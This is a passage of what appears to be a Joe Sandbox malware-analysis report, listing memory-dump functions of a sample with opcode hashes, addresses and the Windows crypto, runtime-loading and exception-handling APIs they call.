Source File: 00000006.00000002.1918651021.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3300000_907.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d084f43f57f29b9234269428bbec1be03604731277541d6d15dd61e2512f807
Instruction ID: 3ef36ceb8ec58cf1d283f3365c88955e6fd3f35f576f4b5eda801b7d000d315f
Opcode Fuzzy Hash: 2d084f43f57f29b9234269428bbec1be03604731277541d6d15dd61e2512f807
Instruction Fuzzy Hash: B801B2B4E04209EFCB40DFA9D595A9DFBF8FB48200F1086AA9818A7341E7709E45DF80

Uniqueness

Uniqueness Score: -1.00%

Function 0330CC48 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1918651021.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3300000_907.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caeae2dee4e46b6f2308a23cb2c688aa7772752342b6a548a831b58d717121f1
Instruction ID: fcbec9078ea912fc6ee597038c53657c120da918164901c659e9a103ac7a68e5
Opcode Fuzzy Hash: caeae2dee4e46b6f2308a23cb2c688aa7772752342b6a548a831b58d717121f1
Instruction Fuzzy Hash: F7F0A774E14208EFC704FFF4E5D46AEFBB9EB49600F2052A89409AB380DB305E42DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0330A190 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1918651021.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3300000_907.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1869db6a31902a7ecd1efd9e691e56831db36f767382620f794a23fbac47778
Instruction ID: 6d173684d7f1de9f775de4670ee9b17fad96bae107b6264c70d986982680d0ba
Opcode Fuzzy Hash: b1869db6a31902a7ecd1efd9e691e56831db36f767382620f794a23fbac47778
Instruction Fuzzy Hash: 01F03034C15308DFC744EFB4F4996BCBFB8EB09202F1045A9D80993280EB300A41DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0330A0C0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1918651021.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3300000_907.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2baf292ef1a2f1793a31b27182078c0138447387d7c30e8675e25321a3341c2
Instruction ID: 5a7a47ac8c8fe45e1b340e8ddade8148764ed9f372c0e120298e347e12fb5fbe
Opcode Fuzzy Hash: d2baf292ef1a2f1793a31b27182078c0138447387d7c30e8675e25321a3341c2
Instruction Fuzzy Hash: 2CE026709113489FCB00FBB4F918BACBBB69B02304F0041D9D589A7280CBB50A40E315

Uniqueness

Uniqueness Score: -1.00%

Function 0330FE50 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1918651021.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3300000_907.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e14a0765e847a28a11e9d033de664f7a67c6591005998de6bb44cc9f66fc8ff0
Instruction ID: f181184a1e9c44b855c84951bf792a1846e48b75914bfde94bab07bf523f56a3
Opcode Fuzzy Hash: e14a0765e847a28a11e9d033de664f7a67c6591005998de6bb44cc9f66fc8ff0
Instruction Fuzzy Hash: 97E0C235A20B148BEB00BB78F40865A7BE8EB85315F02412AE606A7785EF74DC8587D2

Uniqueness

Uniqueness Score: -1.00%

Function 0330A030 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1918651021.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3300000_907.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c6113927a87e39154c7ad435b52582a5262171e359e00b40161f85e2fc960d9
Instruction ID: 0da7449f73b3605c6d35a7efd279eb8c732534cd5f6474db87d173e1cce5599b
Opcode Fuzzy Hash: 3c6113927a87e39154c7ad435b52582a5262171e359e00b40161f85e2fc960d9
Instruction Fuzzy Hash: 75B0927004170D8AC614B7E9BA0EB68BBA8770531AF845361B90C018914FB96195C6A6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6F88A0C0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 227libraryloaderCOMMON

Download Yara Rule

APIs

CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,6F900634,6F900738,?), ref: 6F88A119
GetModuleHandleW.KERNEL32(mscorwks), ref: 6F88A145
__cftoe.LIBCMT ref: 6F88A1FB
GetModuleHandleW.KERNEL32(?), ref: 6F88A215
GetProcAddress.KERNEL32(00000000,00000018), ref: 6F88A265

Strings

mscorwks, xrefs: 6F88A140
v2.0.50727, xrefs: 6F88A110
wks, xrefs: 6F88A10B

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: HandleModule$AddressBindProcRuntime__cftoe
String ID: mscorwks$v2.0.50727$wks
API String ID: 1312202379-2066655427
Opcode ID: 39afa3bfc7c7a34407f7353d4d163731b417eaea272709ddb349455987f49895
Instruction ID: 7d03aed6e7eea1112c2ae43488f4147390efd37f68312a12f4e80de217582229
Opcode Fuzzy Hash: 39afa3bfc7c7a34407f7353d4d163731b417eaea272709ddb349455987f49895
Instruction Fuzzy Hash: 1C915C70D04249AFDB04DFE8D8809DEBBB5BF49310F1486AEE529EF290D734A945CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6F8CDBB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,8E16AAE4,6F8F8180,00000000,?), ref: 6F8CDBFB
GetLastError.KERNEL32 ref: 6F8CDC01
CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6F8CDC15
CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6F8CDC26
SetLastError.KERNEL32(00000000), ref: 6F8CDC2D

Part of subcall function 6F8CD9D0: GetLastError.KERNEL32(00000010,8E16AAE4,75A8FC30,?,00000000), ref: 6F8CDA1A

__CxxThrowException@8.LIBCMT ref: 6F8CDC78

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

Strings

CryptAcquireContext, xrefs: 6F8CDC35
Crypto++ RNG, xrefs: 6F8CDC0D, 6F8CDC20

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
String ID: CryptAcquireContext$Crypto++ RNG
API String ID: 3279666080-1159690233
Opcode ID: 61c3b56005bea218918a6427219fa17723d1763106efc3967376fede872340c6
Instruction ID: b80500553517385bbacbbc19352a71d2edd431701b44c3a3b6f5342fa749462b
Opcode Fuzzy Hash: 61c3b56005bea218918a6427219fa17723d1763106efc3967376fede872340c6
Instruction Fuzzy Hash: 17218371248700AFE710EB28DC45F5AB7E8AF89794F00095DF6419A2C0DBB5E145C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 6F8D948B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6F8DCE6C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F8DCE81
UnhandledExceptionFilter.KERNEL32(6F8F9428), ref: 6F8DCE8C
GetCurrentProcess.KERNEL32(C0000409), ref: 6F8DCEA8
TerminateProcess.KERNEL32(00000000), ref: 6F8DCEAF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 34c227f02decffbce055791d8cb2d26e437a136b43ea81e501901ec6f906dc0f
Instruction ID: 9eba92525b205b4baf0acd9bf29cd787a1894636b1272e248c934699fe6fd72d
Opcode Fuzzy Hash: 34c227f02decffbce055791d8cb2d26e437a136b43ea81e501901ec6f906dc0f
Instruction Fuzzy Hash: 02211674409A04DFEF90CF28D646A443BF6FB4A374F1046AAE509CBB40E77055A1CF65

Uniqueness

Uniqueness Score: -1.00%

Function 6F8C5DD0 Relevance: 6.4, APIs: 4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62ff50f2f8c3238e9bf3aee5bca37a0d3c190ccd9e3e221398436ea6fcc19642
Instruction ID: ee9b902890bc2eb7f34e6cc274ef3846b668d3dc694186be2b32bbfc1dcbefa0
Opcode Fuzzy Hash: 62ff50f2f8c3238e9bf3aee5bca37a0d3c190ccd9e3e221398436ea6fcc19642
Instruction Fuzzy Hash: 47028B704187548FD744CF6AC8A153EBBF2EBCA221F4109AEE5FA57395C234A568CB31

Uniqueness

Uniqueness Score: -1.00%

Function 6F8C5EB9 Relevance: 6.3, APIs: 4, Instructions: 318COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6F8C62FC
_memmove.LIBCMT ref: 6F8C632B
_memmove.LIBCMT ref: 6F8C635A
_memmove.LIBCMT ref: 6F8C6389

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: ed0b6a58f5ae0eaee0ff639415d68d7f0e602ab3a826fa378532608c854b23d1
Instruction ID: 352093df043020c8f159e80831798b81cad22cf269735b5137ce1c718f85566e
Opcode Fuzzy Hash: ed0b6a58f5ae0eaee0ff639415d68d7f0e602ab3a826fa378532608c854b23d1
Instruction Fuzzy Hash: C3E18D7041C7548AD744CF6AC8A113E7BF2EBC6221F4205AEE1F557399C234A168CB31

Uniqueness

Uniqueness Score: -1.00%

Function 6F8CDE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32(?,?,?,8E16AAE4,00000000), ref: 6F8CDE6F
__CxxThrowException@8.LIBCMT ref: 6F8CDEB9

Part of subcall function 6F8CDD20: CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6F8EF0E6,000000FF,6F8CDF67,00000000,?), ref: 6F8CDDB4

Strings

CryptGenRandom, xrefs: 6F8CDE7B

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Crypt$ContextException@8RandomReleaseThrow
String ID: CryptGenRandom
API String ID: 1047471967-3616286655
Opcode ID: 702e576d7f8a24eaf672efd91d7f6e2b703975385f92a19e40e4be66ec980fd8
Instruction ID: dad006b7c0d67de8d089523feaaa7f58d702b523c6bfe06c7280ed9269ffc50c
Opcode Fuzzy Hash: 702e576d7f8a24eaf672efd91d7f6e2b703975385f92a19e40e4be66ec980fd8
Instruction Fuzzy Hash: F5213B7150C740AFD704DF28C445B5ABBF9BB89724F004A5EF4658B380DB74E544CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6F8CD9D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000010,8E16AAE4,75A8FC30,?,00000000), ref: 6F8CDA1A

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

Strings

operation failed with error , xrefs: 6F8CDA49
OS_Rng: , xrefs: 6F8CDA35

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ErrorLastXinvalid_argumentstd::_
String ID: operation failed with error $OS_Rng:
API String ID: 406877150-700108173
Opcode ID: a7c89822659868d5279527f37001c99bcc98a70e6b04e7705e30a1b5897e6939
Instruction ID: b248286c08d647e6aac433730038faceecb23ecb783c33025aa36d4660476e57
Opcode Fuzzy Hash: a7c89822659868d5279527f37001c99bcc98a70e6b04e7705e30a1b5897e6939
Instruction Fuzzy Hash: 7F415EB1508380EFD320CF69C841B5BBBE9BF95654F104D6EF1998B281DB759444CB63

Uniqueness

Uniqueness Score: -1.00%

Function 6F8CDEE0 Relevance: 1.6, APIs: 1, Instructions: 71encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 6F874760: __CxxThrowException@8.LIBCMT ref: 6F8747F9

CryptReleaseContext.ADVAPI32(?,00000000,00000000,?), ref: 6F8CDF7B

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ContextCryptException@8ReleaseThrow
String ID:
API String ID: 3140249258-0
Opcode ID: 5a16ec62d20180a495d31e67bdc335354037ec4d8eaa146530ae0e45ef005f21
Instruction ID: 7ee5b404bc764539ccc00c7efb2295cb7bb07a6cb58ca22b3d4dcab34ce51239
Opcode Fuzzy Hash: 5a16ec62d20180a495d31e67bdc335354037ec4d8eaa146530ae0e45ef005f21
Instruction Fuzzy Hash: F121AFB6909344AFC700DF18D940B4BBBE8EB9A768F000A5DF85587381D771E508CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6F8CDD20 Relevance: 1.6, APIs: 1, Instructions: 66encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6F8EF0E6,000000FF,6F8CDF67,00000000,?), ref: 6F8CDDB4

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 95ffe125522ddfa77d923dd997c389118fd4163c927a0064aa13df313983d81b
Instruction ID: 24d9efd2573a53d74b7bd8d0ccd4a557dd7b6cc2188326f5db9a2f0b85dfadec
Opcode Fuzzy Hash: 95ffe125522ddfa77d923dd997c389118fd4163c927a0064aa13df313983d81b
Instruction Fuzzy Hash: 8311B7B2A48B505BFB18DF58888275673E5EB45A50F040DBAF925CB380EB75E404C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6F8CD7F0 Relevance: 1.5, APIs: 1, Instructions: 17encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 6F8CD803

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: ead82dfa0d51695501562e3822abd159b5c2f5487181dc9d313ec30eeeb77ae9
Instruction ID: 718b1836b7bcd5fe1c4e9add95f682804bb54283b35f13209f4e301e0112cdc6
Opcode Fuzzy Hash: ead82dfa0d51695501562e3822abd159b5c2f5487181dc9d313ec30eeeb77ae9
Instruction Fuzzy Hash: 42D05EB2B4632026DB24AB58AC05B8776C89F41A84F154CAAF56DDA280D7B0E484C7D6

Uniqueness

Uniqueness Score: -1.00%

Function 6F8F35E0 Relevance: 1.5, APIs: 1, Instructions: 17encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 6F8F35F5

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 903e18f3dbef6586c168ad88eb86280701ec7ac5c38943be4aefc7a2b0cae8df
Instruction ID: 8db52278f2b3213e8827f68fa28270abb43cc3b12985e3f34a15cee857e75b49
Opcode Fuzzy Hash: 903e18f3dbef6586c168ad88eb86280701ec7ac5c38943be4aefc7a2b0cae8df
Instruction Fuzzy Hash: A9D05EB15066115BFE15CA6CED06B8632E85B466A0F0905E1F504CB280DB64E811CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6F8CD7D5 Relevance: 1.5, APIs: 1, Instructions: 8encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 6F8CD7E0

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: f0437542959c6afa2d2fdec8f04af7ed21f472dcd114cb3933cfa8a7ecb48f6b
Instruction ID: 1e6fb8b3ccc23266ab452c39df13772d56578ca9e49b759f6dbc7458010741a0
Opcode Fuzzy Hash: f0437542959c6afa2d2fdec8f04af7ed21f472dcd114cb3933cfa8a7ecb48f6b
